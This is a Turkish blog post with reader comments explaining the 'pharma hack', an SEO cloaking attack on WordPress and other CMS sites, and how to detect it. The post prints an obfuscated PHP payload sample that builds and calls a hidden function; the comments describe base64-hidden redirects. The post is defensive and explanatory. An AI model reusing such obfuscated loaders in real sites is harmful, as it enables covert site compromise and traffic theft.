Pharma hack (Google Cloaking Hack) nedir?

Dikkat: Bu yazının yazılma tarihinin üzerinden en az 60 gün geçmiş. İçerisindeki bilgiler güncelliğini yitirmiş olabilir. Yorumları ve güncellemeleri göz önünde bulundurarak yazıyı takip ediniz.

Pharma hack nedir?

Pharma hack bır çeşit SEO saldırısıdır. Asıl adı Google Cloaking Hack'dır. Sitenizi html çıktısını kullanıcıya göre manipüle etmek üzerine kuruludur. Pharma hack adını genellikle internette cinsel sağlık ürünleri veya besin takviyesi satan şirketlerin bu hack ile trafik kazanmaya çalışmasından almıştır. Yani bu hack sadece sitenizin arama motoru trafiğini kesmez. Tabi siz analitics yazılımlarda bir trafik kaybı görmezsiniz. Sadece bounce rate'iniz her gün yükselir ve dış trafiğiniz artar. Bu da pagerank'ınızı kaybetmeninizi sağlayabilir.

Büyük tehlike ise sitenizin sansürlenmesi. Türkiye'de son dönemde birçok sitenin/blogun sansürlerden dolayı engellendiğini görüyorsunuz. Bu filtreler genelde halka açık ortamlar, eğitim kurumları gibi alanlarda çok daha etkin. Yani zararsız bir siteye sahip olsanız bile bu hack ile MEB ve BTK'nın google indeksleri ile edindiği site bilgisi genelde cinsel sağlık ürünleri olacağı için muhtemelen siz o içeriğe sahip olmasanız bile okullar, internet cafe'ler gibi yerlerden otomatik olarak filtrelenmiş olacaksınız.

Nasıl oluyor?

Pharma hack sitenize doğrudan ziyaretle anlayamayacağınız bir saldırıdır. Siteniz doğrudan gelen ziyaretçilere normal çıktısını verir ve tarayıcıda doğrudan sitenize giren insanlar sitenizi görmeye devam ederler, böylece siz de anlamazsınız pharma hack altında olduğunuzu.

Ama arama motoru botları sitenizi taramaya çalıştığı zaman sitenizin hack kodu sitenizin sayfa başlığı, anahtar kelimeleri gibi meta etiketlerini değiştirip sayfa içeriğinde istedikleri anahtar kelimeleri de ekleyerek sitenizin çıktısını manipule eder. Böylece pagerank'ınızı kullanarak arama motorlarından gelen trafiğinizi çalarlar. Böylece sitenize ait tüm google indeksleri bir sonraki güncellemede o anahtar kelimeleri alır. Eğer siteniz yüksek page rankına sahipse o anahtar kelimelerde üst sıralarda çıkar ve kullanıcı linke tıkladıgı zaman sayfanızdaki ufak bir javascript kodu kullanıcıyı başka bir sunucuya yönlendirir. Arama motoru trafiğiniz yanlış içerikle sunulur ve kısaca arama motoru trafiğiniz başka bir siteye yönlendirilir.

Sitenizde pharma hack var mı?

Sitenizi sayfaları kontrol ederek pharma hack olup olmadığını anlayamazsınız. Birkaç yolu var;

1) Tarayıcınızın User Agent'ını GoogleBot olarak değiştirip sitenize girebilir, sayfalarınız öyle kontrol edebilirsiniz.

2) Google Webmaster Tools'a kayıt olup sitenizi ekleyip google botun sitenizi nasıl taradığını görebilirsiniz. Googlebot site sitenizin verdiği HTML çıktısını gösterecektir. Meta etiketlerinizi ve sayfa içeriğinizi kontrol edip fakrlı olup olmadığını görebilirsiniz.

Ne tür uygulamalarda yapıyorlar?

Benim gördüğüm örnekleri popüler php hostinglerde ya sunucu kontrolünü ele geçirdikten sonra tüm hesaplara ya da sadece sizin hesabınızı ele geçirdilerse sizin hesabınızda yapılan birkaç ufak php numarasıyla sayfalarınızı arama motoru botlarında farklı render etme üzerine kuruludur. Eğer bir wordpress bloguna veya joomla, drupal gibi bir CMS kullanıyorsanız muhtemel olarak tehlike altındasınız demektir çünkü ele geçirilmesi, gizlenmesi en kolay ve hackerların hedef kitlesidir.

Örnek bir pharma hack kodu göstermem gerekirse:
$check_tmg_password_reset_key = 'QN9Mrh7F=4?C!N^NP.NJ16YH6K66G=+BOeHeQ7D?A!"
CMD$JT,UTP@#3kSZ=j8;>?=B5$(v+}k~)tKkwz6puT|_P{-[11):V;Hblc<eyfau+Z4r29[dID2ThIY.E^A|AHcN@E-
woZPd'^'48X!Z(P<TZY/@:;f6G"/nQ<<i(YX3XE6<MjJ9X)ZnLD:7kE.9E;z=&ZIE05PEHZ
PZQmyMJY{5;*h8d;?*b19{,7 [email protected]#O-M<+l18*N[X,Z]FT+K96]$E+8] 
q

t{R`0+JUFsy_';

$make_ao_site_theme_from_oldschool = '"`E``e_Fe$"dai.'|'Are!t!Y tncT)oF'; $wp_rzc_newPage = $make_ao_site_theme_from_oldschool('',$check_tmg_password_reset_key); $wp_rzc_newPage();
Bu kod wordpress bloglar için özellikle yazılmış bir pharma hack kodu. Genelde sitenizde her sayfada çalıştırılan bir dosyada yer alırlar. (bootstrap.php, common.php, db.php vs...)


Hazırlayan : Mehmet Fatih YILDIZ

Yorumlar

2 Ocak Pazartesi ´12 01:53
Soz konusu saldiri pharma hack adi altinda islendigini bilmiyorum da 4 ay once blog olarak hazirladigim projelerden birinin google siralamarinda cikmadigini fark ettim. Soz konusu saldiri sadece pharmacy kullanilarak degil sacma sapan bir sayfa yon verilerekde ranklerde oldukca asagi dusurmeye basliyor.

Arastirmalarim sonunuca; Saldiri icin kesinlikle server'iniza saldirilmasi gerekmektedir. Hazir bloglar bundan en buyuk yarayi almaktadirlar. Icerisine yuklenen pluginler ve blog geneline access yapabilen bir eklenti bile size bu kodun calismasina sebep olmaktadir. Onun disinda hazir bloglarinizi guncellemezseniz icerisindeki aciklardan saldirilarak sayfanizda boylece basit bir saldiri ile google ranklerini oynayabiliyorlar.

Fatihin verdigi kodun bir farkli versiyonuda sitenizi baska bir sayfaya yonlendirmeye yarayan php location headerini base64 decode edip anlamsiz hale getirip sitenizin ilk satirina uzunca koyarlar. Hemen altinda bunu decode ederler.. Eger php ile fazla alakali degilseniz karmasik sayilar gozunuzu aradigi kod satirlari degildir ve asla problemi cozemezsiniz.

Bu makale yazmayi dusundugum ama surekli erteledigim bir makaleydi. Aradigimda turkce makale bulamamistim. Umarim problemi yasiyanlar buradan bu bilgiye ulasirlar.

Yazi icin Tesekkurler Fatih.
2 Ocak Pazartesi ´12 09:17
Eğer bu hackerlar sayfaların kodlarına erişebiliyorlarsa sitemize sadece yönlendirme kodları koymak yerine her şeyi yapamazlar mı? Acaba yapabileceklerini biliyorlar ancak o halde bizim hemen düzeltmemizden mi korkuyorlar?
2 Ocak Pazartesi ´12 09:49
@alone, evet aslinda teknik olarak siteni degistirebilirler ama amac zaten site sahibini huylandirmadan google trafigini calmaktir. Cunku sitenin kapatilmasi vs gibi agresif aksiyonlar genelde cok kisa sure yasar, yani hemen ya site sahibi ya da en kotu ihtimalle hosting sirketi tarafindan mudahale edilerek degistirilir.

Su an benim sunucumda bir sekilde duzenli olarak siteme pharma hack yerlestiren bir kod var. Bunun benim hosting accountumla degil sunucuyla ilgili oldugunu dusunuyorum, cunku gecen ay butun domainlerimi DreamHost'a tasidim. Dreamhost cok populer bir host oldugu icin sunucularinda hackerlarin cirit attigindan eminim.

Neyse benim cozumum ise saatlik bir cron scripti ile tum siteyi temiz olarak deploy etmek oluyor. Yaklasik 4-5 saniye suruyor bu deployment ve zararli kodlari temizliyor. Bu konuda bir dokuman yazacagim pharma hack icin alinabilecek aksiyonlar icin.
2 Ocak Pazartesi ´12 09:51
bu dediğiniz sitede varmış gibi gösterme işini sitesine bulaşmasından dolayı olanı anlıyorum. tamam mağdur diyelim bunlara, fakat bazı siteler de aynı işi ziyaretçi çekmek için kullanıyorlar. bir şey araştırırken bu siteler insanı çileden çıkartıyor
Üye Resmi Türker Sezer
2 Ocak Pazartesi ´12 17:06
Bazen dosya izinlerinin hatalı atanması, bazen de dosyaların başkalarının erişimine açık bırakılmak zorunda kalınması paylaşımlı sunucularda sorun oluşturabiliyor. Uygulama tarafından kullanılması için web sunucu tarafından yazılabilir yaptığın dizine aynı sunucuda çalışan başka bir kod da erişebiliyor.

Dreamhost'ta, hosting ayarlarında ekstra güvenlik seçeneği mevcut. Bu seçeneği etkinleştirirsen dosyaların hatalı izin tanımlanması durumunda dahi başkaları tarafından erişilemez olacaktır. Belki yaşadığın sıkıntı bu şekilde çözülebilir.
2 Ocak Pazartesi ´12 21:02
Tesekkur ederim Turker, inceleyecegim, su an icin gecici cozum buldum, yakinda daha detayli calisacagim bu konu ustunde.
4 Ocak Çarşamba ´12 07:50
Sanirim DreamHost'taki Enhancement Security secenegi problemimi cozdu. Tesekkurler Turker.

Yine de Pharma hack hakkinda bir dokuman daha yazacagim.
Üye Resmi Turgut Sezer
24 Haziran Pazar ´12 04:52
Merhaba ben de sitemde wp cms kullanıyorum. böyle şeylerden korunabilmek için, sitenin wp ile üretildiğini gösteren versiyon kodlarının görünmemesini sağlasam kurtulabilir miyim dersiniz?
Üye Resmi awdawd
25 Kasım Çarşamba ´15 19:26
Nasıl bir şey bu...
Yeni Yorum *
İletişim Bilgileri
*
*
E-Posta adresiniz gösterilmeyecektir.
(unut)
Güvenlik Kodu *

Gönderiliyor